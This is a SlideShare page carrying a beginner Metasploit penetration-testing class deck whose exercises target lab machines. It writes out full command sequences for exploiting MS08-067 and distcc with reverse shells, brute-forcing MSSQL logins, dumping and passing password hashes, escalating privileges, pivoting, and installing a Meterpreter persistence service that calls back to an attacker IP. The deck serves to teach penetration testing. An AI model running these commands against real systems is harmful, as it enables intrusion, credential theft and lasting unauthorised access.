Georgia Weidman, profile picture
Uploaded byGeorgia Weidman
PDF, PPTX32,099 views

Metasploit for Penetration Testing: Beginner Class

1. An introduction to Metasploit basics, terminology, and interfaces like Msfconsole. 2. A demonstration of exploiting vulnerabilities using Metasploit modules and payloads like Meterpreter. 3. A discussion of post-exploitation techniques in Metasploit like privilege escalation, lateral movement, and maintaining access.

Embed presentation

Download as PDF, PPTX
Penetration Testing with Metasploit Georgia Weidman
Acknowledgements • Metasploit Team • Offensive Security/Metasploit Unleashed • Hackers for Charity • David Kennedy • BSides Delaware Crew • Darren
Agenda • Metasploit Basics – Some terminology/brief intro to pentesting – How Metasploit works – Interacting with Metasploit • Basic Exploitation – Exploiting a vulnerability using Metasploit console • Using Meterpreter – Using the Meterpreter shell for post exploitation
Agenda • Metasploit in a penetration test – Information Gathering – Vulnerability Scanning – Exploitation in depth – Post exploitation – Reporting • Hack some stuff – Pop my boxes
Connecting Wireless access point SSID IgnatiusRiley Password: metasploit
What’s in the lab? • Windows XP SP2 – IP address: 192.168.20.22 • Ubuntu Linux 8.04 (Metasploitable) – IP address: 192.168.20.23 Others below .100 (.100 and above are you guys)
What is Penetration Testing? Simulation of a real attack Get out of jail free card for exploiting systems Report to customers with findings and recommendations Find and remediate vulnerabilities before attackers exploit them
What is Metasploit? Exploitation framework Ruby based Modular Exploits, payloads, auxiliaries, and more
Metasploit Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do Encoders: encode or mangle payload Auxiliary: other modules besides exploitation Session: connection from a successful exploit
Metasploit Interfaces Msfconsole Msfcli Msfweb, Msfgui (discontinued) Metasploit Pro, Metasploit Express Armitage
Exploitation Streamlining • Traditional Pentest: – Find public exploit – Change offsets and return address for your target – Replace shellcode • Metasploit: – Load Metasploit module – Select target OS – Set IP addresses – Select payload
Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
Windows Exploitation Example search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 (set other options as well) exploit
MSFcli Exploitation Example ./msfcli <exploit> <option=x> E Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E E = exploit O = show options P = show payloads
Linux Exploitation Example search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (your ip) exploit
Sessions sessions -l lists all active sessions Sessions –i <id> interact with a given session
Meterpreter Gain a session using a meterpreter payload Memory based/never hits the disk Everything a shell can do plus extra
Meterpreter Commands help – shows all available commands background – backgrounds the session ps – shows all processes migrate <process id>– moves meterpreter to another process getuid – shows the user
Meterpreter Commands download <file> - pulls a file from the victim upload <file on attacker> <file on victim> - pushes a file to the victim hashdump – dumps the hashes from the sam shell – drops you in a shell
Exercise In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine. Experiment with different payloads and meterpreter commands.
Information Gathering Learning as much about a target as possible Examples: open ports, running services, installed software Identify points for further exploration
Metasploit and Databases Metasploit supports MySQL and PostgreSQL /etc/init.d/postgresql-8.4 start (starts PostgeSQL) msf > db_connect postgres:password@127.0.0.1/metasploit (connects to database server and creates database metasploit)
Portscanning Queries a host to see if a program is listening Ex: Browsing to a website – webserver listens on port 80 Listening ports are accessible by an attacker and if vulnerable may be used for exploitation Ex: ms08_067_netapi exploits smb on port 445
Metasploit and nmap Port scanning and just about everything else http://nmap.org/ man nmap Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1) msf > db_import subnet1.xml
MSF Axillary Portscanners msf > search portscan (shows portscan modules) scanner/portscan/tcp (runs a TCP syn scan) Use auxiliary modules like exploits (use, set, exploit, etc.)
Some Other MSF Scanners scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version) scanner/ssh/ssh_version (queries the ssh version) scanner/ftp/anonymous (anonymous ftp login)
Vulnerability Scanning Query systems for potential vulnerabilities Identify potential methods of penetration Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
Metasploit and Nessus Tenable's Vulnerability Scanner (http://www.nessus.org) msf>load nessus msf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok) msf > nessus_policy_list msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage) msf> nessus_report_list msf> nessus_report_get <report id>
Metasploit Vulnerability Scanners SMB Login Given a set of credentials what systems can they access? scanner/smb/smb_login Open VNC and X11 If misconfigured may be accessible without credentials scanner/vnc/vnc_none_auth scanner/x11/open_x11
Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
Our Database hosts services vulns -c select columns -s search for specific string
db_autopwn By default just runs all the exploits that match a given open port Not stealthy Using vulnerability data can be made smarter, matches vulnerabilities instead of ports db_autopwn -x -e
Attacking MSSQL MSSQL TCP port can change, UDP port is 1434 msf> search mssql (shows all mssql modules) msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port) msf> use scanner/mssql/mssql_login (tries passwords to log into mssql) msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell
We have a shell, now what? Privilege escalation Local information gathering Exploiting additional hosts Maintaining access Forensic avoidance
Meterpreter: Privilege Escalation A session has the privileges of the exploited process getuid (tells you what user your session is running as) getsystem (tries various techniques to escalate privileges)
Meterpreter: Enabling Remote Desktop Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group run getgui –e
Meterpreter: Migrating If the process that hosts meterpreter closes meterpreter dies too Example: client side exploit residing in the browser meterpreter> ps (shows all processes) meterpreter> migrate <process id> (moves to a new process)
Meterpreter: Searching for Content Look for specific interesting files on the exploited system search -h Example: search -f *.jpg (finds all the porn)
Pivoting Scenario: Exploit a dual networked host, with a routeable interface and non routable one. Can we attack other hosts on the non routeable interface without SSH tunneling? Route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1) Now you can portscan, exploit, etc. the non routable subnet
PSExec hashdump (dumps the hashes, not always easy to crack) Why not just pass the hash to other systems? use windows/smb/psexec set SMBPass to the hash
Meterpreter: Persistence Persistence script installs a meterpreter service Meterpreter comes back when the box restarts Ex: run persistence -U -i 5 -p 443 –r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
Exercises Perform a penetration test on the Windows and Linux systems we used in class Perform a penetration test on the lab network
Contact Georgia Weidman Website: http://www.grmn00bs.com http://www.georgiaweidman.com Email: georgia@grmn00bs.com Twitter: @vincentkadmon

More Related Content

PPTX
Metasploit framwork
byDeepanshu Gajbhiye
 
PPTX
Metasploit For Beginners
byRamnath Shenoy
 
PDF
Metaploit
byAjinkya Pathak
 
PPTX
Metasploit
byInstitute of Information Security (IIS)
 
PPTX
Metasploit
byLalith Sai
 
PDF
Pentest with Metasploit
byM.Syarifudin, ST, OSCP, OSWP
 
PPTX
Finalppt metasploit
bydevilback
 
PPTX
Introduction to Metasploit
byGTU
 
Metasploit framwork
byDeepanshu Gajbhiye
 
Metasploit For Beginners
byRamnath Shenoy
 
Metaploit
byAjinkya Pathak
 
Metasploit
byInstitute of Information Security (IIS)
 
Metasploit
byLalith Sai
 
Pentest with Metasploit
byM.Syarifudin, ST, OSCP, OSWP
 
Finalppt metasploit
bydevilback
 
Introduction to Metasploit
byGTU
 

What's hot

PPTX
Introduction To Exploitation & Metasploit
byRaghav Bisht
 
PPTX
Metasploit seminar
byhenelpj
 
PDF
Pen-Testing with Metasploit
byMohammed Danish Amber
 
PDF
What is Penetration & Penetration test ?
byBhavin Shah
 
PDF
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
PDF
Attacker's Perspective of Active Directory
bySunny Neo
 
PPTX
NETWORK PENETRATION TESTING
byEr Vivek Rana
 
PDF
Ransomware Resistance
byFlorian Roth
 
PPTX
Penetration testing using metasploit
byAashish R
 
ODP
Scanning with nmap
bycommiebstrd
 
PPTX
kali linux Presentaion
byDev Gandhi
 
PDF
Nmap Basics
byamiable_indian
 
PPTX
OpenVAS
bysvm
 
PPTX
Nmap basics
byn|u - The Open Security Community
 
PDF
Understanding Cyber Attack - Cyber Kill Chain.pdf
byslametarrokhim1
 
PDF
Support cours : Vos premiers pas avec le pare feu CISCO ASA
bySmartnSkilled
 
PDF
Nmap Hacking Guide
byAryan G
 
PPTX
Kali Linux
byChanchal Dabriya
 
PDF
Alphorm.com Formation Analyse de Malware 2/2 : Le guide complet
byAlphorm
 
PPTX
Metasploit framework in Network Security
byAshok Reddy Medikonda
 
Introduction To Exploitation & Metasploit
byRaghav Bisht
 
Metasploit seminar
byhenelpj
 
Pen-Testing with Metasploit
byMohammed Danish Amber
 
What is Penetration & Penetration test ?
byBhavin Shah
 
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
Attacker's Perspective of Active Directory
bySunny Neo
 
NETWORK PENETRATION TESTING
byEr Vivek Rana
 
Ransomware Resistance
byFlorian Roth
 
Penetration testing using metasploit
byAashish R
 
Scanning with nmap
bycommiebstrd
 
kali linux Presentaion
byDev Gandhi
 
Nmap Basics
byamiable_indian
 
OpenVAS
bysvm
 
Nmap basics
byn|u - The Open Security Community
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
byslametarrokhim1
 
Support cours : Vos premiers pas avec le pare feu CISCO ASA
bySmartnSkilled
 
Nmap Hacking Guide
byAryan G
 
Kali Linux
byChanchal Dabriya
 
Alphorm.com Formation Analyse de Malware 2/2 : Le guide complet
byAlphorm
 
Metasploit framework in Network Security
byAshok Reddy Medikonda
 

Viewers also liked

PDF
Metasploit
byninguna
 
PPTX
Metasploit
byRaghunath G
 
PPTX
Basic Metasploit
byMuhammad Ridwan
 
PDF
Metasploit Basics
byamiable_indian
 
PPT
Bypassing the Android Permission Model
byGeorgia Weidman
 
PDF
Metasploit Humla for Beginner
byn|u - The Open Security Community
 
PDF
Ethical Hacking & Penetration Testing
bySurachai Chatchalermpun
 
PPTX
BSides Algiers - Metasploit framework - Oussama Elhamer
byShellmates
 
PPT
Why Data Virtualization? An Introduction by Denodo
byJusto Hidalgo
 
PPTX
Big Data Analytics with Hadoop
byPhilippe Julio
 
PPTX
Big data ppt
byNasrin Hussain
 
PDF
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
byAlphorm
 
PDF
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
bythePlatform
 
PPT
"15 Business Story Ideas to Jump on Now"
byReynolds Center for Business Journalism
 
PPTX
Diarrhea:Myths and facts, Precaution
byWuzna Haroon
 
PDF
Alta White Paper D2C eCommerce Case Study 2016
byPatrick Nicholson
 
DOC
cathy resume
byCatherine Towery Sales
 
PDF
Basics of Coding in Pediatrics Medical Billing
byOutsource Strategies International
 
Metasploit
byninguna
 
Metasploit
byRaghunath G
 
Basic Metasploit
byMuhammad Ridwan
 
Metasploit Basics
byamiable_indian
 
Bypassing the Android Permission Model
byGeorgia Weidman
 
Metasploit Humla for Beginner
byn|u - The Open Security Community
 
Ethical Hacking & Penetration Testing
bySurachai Chatchalermpun
 
BSides Algiers - Metasploit framework - Oussama Elhamer
byShellmates
 
Why Data Virtualization? An Introduction by Denodo
byJusto Hidalgo
 
Big Data Analytics with Hadoop
byPhilippe Julio
 
Big data ppt
byNasrin Hussain
 
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
byAlphorm
 
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
bythePlatform
 
"15 Business Story Ideas to Jump on Now"
byReynolds Center for Business Journalism
 
Diarrhea:Myths and facts, Precaution
byWuzna Haroon
 
Alta White Paper D2C eCommerce Case Study 2016
byPatrick Nicholson
 
cathy resume
byCatherine Towery Sales
 
Basics of Coding in Pediatrics Medical Billing
byOutsource Strategies International
 

Similar to Metasploit for Penetration Testing: Beginner Class

PDF
Metasploit: Pwnage and Ponies
byTrowalts
 
PDF
Metasploit Computer security testing tool
bymedoelkang600
 
PDF
24 33 -_metasploit
bywozgeass
 
PPTX
Network Penetration Testing
byMohammed Adam
 
PPTX
DC612 Day - Hands on Penetration Testing 101
bydc612
 
PPTX
Client side exploits
bynickyt8
 
PDF
iCrOSS 2013_Pentest
byM.Syarifudin, ST, OSCP, OSWP
 
PPTX
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
byRob Fuller
 
PPTX
Penetration Testing and Intrusion Detection System
byBikrant Gautam
 
KEY
Metasploit @ 2010 Utah Open Source Conference
byJason Wood
 
DOCX
Backtrack Manual Part6
byNutan Kumar Panda
 
DOCX
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
bySyed Ubaid Ali Jafri
 
PPTX
Intimacy with MSF - Metasploit Framework
byAnimesh Roy
 
PPTX
Phases of penetration testing
byAbdul Rahman
 
PDF
Black hat dc-2010-egypt-uav-slides
byBakry3
 
DOCX
Backtrack Manual Part7
byNutan Kumar Panda
 
PDF
CNIT 124: Ch 8: Exploitation
bySam Bowne
 
PDF
Intrusion Techniques
byFestival Software Livre
 
PDF
SSMF (Security Scope Metasploit Framework) - Course Syllabus
bySecurity Scope
 
PDF
Open Source Cyber Weaponry
byJoshua L. Davis
 
Metasploit: Pwnage and Ponies
byTrowalts
 
Metasploit Computer security testing tool
bymedoelkang600
 
24 33 -_metasploit
bywozgeass
 
Network Penetration Testing
byMohammed Adam
 
DC612 Day - Hands on Penetration Testing 101
bydc612
 
Client side exploits
bynickyt8
 
iCrOSS 2013_Pentest
byM.Syarifudin, ST, OSCP, OSWP
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
byRob Fuller
 
Penetration Testing and Intrusion Detection System
byBikrant Gautam
 
Metasploit @ 2010 Utah Open Source Conference
byJason Wood
 
Backtrack Manual Part6
byNutan Kumar Panda
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
bySyed Ubaid Ali Jafri
 
Intimacy with MSF - Metasploit Framework
byAnimesh Roy
 
Phases of penetration testing
byAbdul Rahman
 
Black hat dc-2010-egypt-uav-slides
byBakry3
 
Backtrack Manual Part7
byNutan Kumar Panda
 
CNIT 124: Ch 8: Exploitation
bySam Bowne
 
Intrusion Techniques
byFestival Software Livre
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
bySecurity Scope
 
Open Source Cyber Weaponry
byJoshua L. Davis
 

Recently uploaded

PDF
Explaining specific examples of purpose-specific BOM
byakipii ogaoga
 
PDF
Odoo Implementation Checklist: A Strategic ERP Blueprint for Business-Ready D...
byBANIBRO IT SOLUTION
 
PDF
GDG Cloud Southlake #49: Pradeep R Kumar: Implications of Agentic AI for Iden...
byJames Anderson
 
PPTX
Beyond the Algorithm: Designing Human-Centric Public Service with AI
byAlan Dix
 
PDF
TravelTech Paris 2025 | The EU Digital Identity Wallet and it’s impact on Tra...
byapidays
 
PPTX
Automation Without Apprentices: How AI Challenges the Open Source Way
byIcinga
 
PDF
The new book “Marketing in the Metaverse” spotlights Scott M. Graffius’ research
byScott M. Graffius
 
PDF
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
PDF
How to Install XRDP on CentOS 10 .pdf
byGreen Webpage
 
PPTX
Working Session — Build a Document Understanding Automation Using an OOTB ML ...
byDianaGray10
 
PDF
Explaining the flow of purpose-specific BOM
byakipii ogaoga
 
PDF
final.pdf
byomarbishtawi04
 
PDF
Rustici Software: eLearning standards in the age of AI
byRustici Software
 
PDF
Automated Governance for FME Flow: Smarter Admin at Scale
bySafe Software
 
PPTX
Computer architecture, Computer architecture ,Computer architecture
bywaheedqazi123
 
PPTX
apidays Paris 2025 | Integration is Feminist: Building Peace in Distributed S...
byapidays
 
PPTX
Introducing VisualSim 2610 The Next Leap in System Level Modeling
byDeepak Shankar
 
PDF
The Manifesto for AI-enabled Governance !
byYannis Charalabidis
 
PDF
Chapter 5 Security Mechanisms iin computer security.pdf
byGetnet Tigabie Askale -(GM)
 
PPTX
Do You Control the AI, or Does the AI Control You?
bymedhateltoukhy
 
Explaining specific examples of purpose-specific BOM
byakipii ogaoga
 
Odoo Implementation Checklist: A Strategic ERP Blueprint for Business-Ready D...
byBANIBRO IT SOLUTION
 
GDG Cloud Southlake #49: Pradeep R Kumar: Implications of Agentic AI for Iden...
byJames Anderson
 
Beyond the Algorithm: Designing Human-Centric Public Service with AI
byAlan Dix
 
TravelTech Paris 2025 | The EU Digital Identity Wallet and it’s impact on Tra...
byapidays
 
Automation Without Apprentices: How AI Challenges the Open Source Way
byIcinga
 
The new book “Marketing in the Metaverse” spotlights Scott M. Graffius’ research
byScott M. Graffius
 
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
How to Install XRDP on CentOS 10 .pdf
byGreen Webpage
 
Working Session — Build a Document Understanding Automation Using an OOTB ML ...
byDianaGray10
 
Explaining the flow of purpose-specific BOM
byakipii ogaoga
 
final.pdf
byomarbishtawi04
 
Rustici Software: eLearning standards in the age of AI
byRustici Software
 
Automated Governance for FME Flow: Smarter Admin at Scale
bySafe Software
 
Computer architecture, Computer architecture ,Computer architecture
bywaheedqazi123
 
apidays Paris 2025 | Integration is Feminist: Building Peace in Distributed S...
byapidays
 
Introducing VisualSim 2610 The Next Leap in System Level Modeling
byDeepak Shankar
 
The Manifesto for AI-enabled Governance !
byYannis Charalabidis
 
Chapter 5 Security Mechanisms iin computer security.pdf
byGetnet Tigabie Askale -(GM)
 
Do You Control the AI, or Does the AI Control You?
bymedhateltoukhy
 

Metasploit for Penetration Testing: Beginner Class

  • 1.
    Penetration Testing with Metasploit Georgia Weidman
  • 2.
    Acknowledgements • Metasploit Team • Offensive Security/Metasploit Unleashed • Hackers for Charity • David Kennedy • BSides Delaware Crew • Darren
  • 3.
    Agenda • Metasploit Basics – Some terminology/brief intro to pentesting – How Metasploit works – Interacting with Metasploit • Basic Exploitation – Exploiting a vulnerability using Metasploit console • Using Meterpreter – Using the Meterpreter shell for post exploitation
  • 4.
    Agenda • Metasploit ina penetration test – Information Gathering – Vulnerability Scanning – Exploitation in depth – Post exploitation – Reporting • Hack some stuff – Pop my boxes
  • 5.
    Connecting Wireless access pointSSID IgnatiusRiley Password: metasploit
  • 6.
    What’s in thelab? • Windows XP SP2 – IP address: 192.168.20.22 • Ubuntu Linux 8.04 (Metasploitable) – IP address: 192.168.20.23 Others below .100 (.100 and above are you guys)
  • 7.
    What is PenetrationTesting? Simulation of a real attack Get out of jail free card for exploiting systems Report to customers with findings and recommendations Find and remediate vulnerabilities before attackers exploit them
  • 8.
    What is Metasploit? Exploitationframework Ruby based Modular Exploits, payloads, auxiliaries, and more
  • 9.
    Metasploit Terminology Exploit: vectorfor penetrating the system Payload: shellcode, what you want the exploit to do Encoders: encode or mangle payload Auxiliary: other modules besides exploitation Session: connection from a successful exploit
  • 10.
    Metasploit Interfaces Msfconsole Msfcli Msfweb, Msfgui(discontinued) Metasploit Pro, Metasploit Express Armitage
  • 11.
    Exploitation Streamlining • TraditionalPentest: – Find public exploit – Change offsets and return address for your target – Replace shellcode • Metasploit: – Load Metasploit module – Select target OS – Set IP addresses – Select payload
  • 12.
    Using Msfconsole: Exploitation use<module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
  • 13.
    Windows Exploitation Example searchwindows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 (set other options as well) exploit
  • 14.
    MSFcli Exploitation Example ./msfcli<exploit> <option=x> E Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E E = exploit O = show options P = show payloads
  • 15.
    Linux Exploitation Example searchdistcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (your ip) exploit
  • 16.
    Sessions sessions -l listsall active sessions Sessions –i <id> interact with a given session
  • 17.
    Meterpreter Gain a sessionusing a meterpreter payload Memory based/never hits the disk Everything a shell can do plus extra
  • 18.
    Meterpreter Commands help –shows all available commands background – backgrounds the session ps – shows all processes migrate <process id>– moves meterpreter to another process getuid – shows the user
  • 19.
    Meterpreter Commands download <file>- pulls a file from the victim upload <file on attacker> <file on victim> - pushes a file to the victim hashdump – dumps the hashes from the sam shell – drops you in a shell
  • 20.
    Exercise In Msfconsole usems08_067_netapi to get a reverse meterpreter shell on the Windows XP machine. Experiment with different payloads and meterpreter commands.
  • 21.
    Information Gathering Learning asmuch about a target as possible Examples: open ports, running services, installed software Identify points for further exploration
  • 22.
    Metasploit and Databases Metasploitsupports MySQL and PostgreSQL /etc/init.d/postgresql-8.4 start (starts PostgeSQL) msf > db_connect postgres:password@127.0.0.1/metasploit (connects to database server and creates database metasploit)
  • 23.
    Portscanning Queries a hostto see if a program is listening Ex: Browsing to a website – webserver listens on port 80 Listening ports are accessible by an attacker and if vulnerable may be used for exploitation Ex: ms08_067_netapi exploits smb on port 445
  • 24.
    Metasploit and nmap Portscanning and just about everything else http://nmap.org/ man nmap Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1) msf > db_import subnet1.xml
  • 25.
    MSF Axillary Portscanners msf> search portscan (shows portscan modules) scanner/portscan/tcp (runs a TCP syn scan) Use auxiliary modules like exploits (use, set, exploit, etc.)
  • 26.
    Some Other MSFScanners scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version) scanner/ssh/ssh_version (queries the ssh version) scanner/ftp/anonymous (anonymous ftp login)
  • 27.
    Vulnerability Scanning Query systemsfor potential vulnerabilities Identify potential methods of penetration Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
  • 28.
    Metasploit and Nessus Tenable'sVulnerability Scanner (http://www.nessus.org) msf>load nessus msf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok) msf > nessus_policy_list msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage) msf> nessus_report_list msf> nessus_report_get <report id>
  • 29.
    Metasploit Vulnerability Scanners SMBLogin Given a set of credentials what systems can they access? scanner/smb/smb_login Open VNC and X11 If misconfigured may be accessible without credentials scanner/vnc/vnc_none_auth scanner/x11/open_x11
  • 30.
    Using Msfconsole: Exploitation use<module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
  • 31.
    Our Database hosts services vulns -c selectcolumns -s search for specific string
  • 32.
    db_autopwn By default justruns all the exploits that match a given open port Not stealthy Using vulnerability data can be made smarter, matches vulnerabilities instead of ports db_autopwn -x -e
  • 33.
    Attacking MSSQL MSSQL TCPport can change, UDP port is 1434 msf> search mssql (shows all mssql modules) msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port) msf> use scanner/mssql/mssql_login (tries passwords to log into mssql) msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell
  • 34.
    We have ashell, now what? Privilege escalation Local information gathering Exploiting additional hosts Maintaining access Forensic avoidance
  • 35.
    Meterpreter: Privilege Escalation Asession has the privileges of the exploited process getuid (tells you what user your session is running as) getsystem (tries various techniques to escalate privileges)
  • 36.
    Meterpreter: Enabling Remote Desktop Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group run getgui –e
  • 37.
    Meterpreter: Migrating If theprocess that hosts meterpreter closes meterpreter dies too Example: client side exploit residing in the browser meterpreter> ps (shows all processes) meterpreter> migrate <process id> (moves to a new process)
  • 38.
    Meterpreter: Searching forContent Look for specific interesting files on the exploited system search -h Example: search -f *.jpg (finds all the porn)
  • 39.
    Pivoting Scenario: Exploit adual networked host, with a routeable interface and non routable one. Can we attack other hosts on the non routeable interface without SSH tunneling? Route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1) Now you can portscan, exploit, etc. the non routable subnet
  • 40.
    PSExec hashdump (dumps thehashes, not always easy to crack) Why not just pass the hash to other systems? use windows/smb/psexec set SMBPass to the hash
  • 41.
    Meterpreter: Persistence Persistence scriptinstalls a meterpreter service Meterpreter comes back when the box restarts Ex: run persistence -U -i 5 -p 443 –r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
  • 42.
    Exercises Perform a penetrationtest on the Windows and Linux systems we used in class Perform a penetration test on the lab network
  • 43.
    Contact Georgia Weidman Website: http://www.grmn00bs.com http://www.georgiaweidman.com Email: georgia@grmn00bs.com Twitter: @vincentkadmon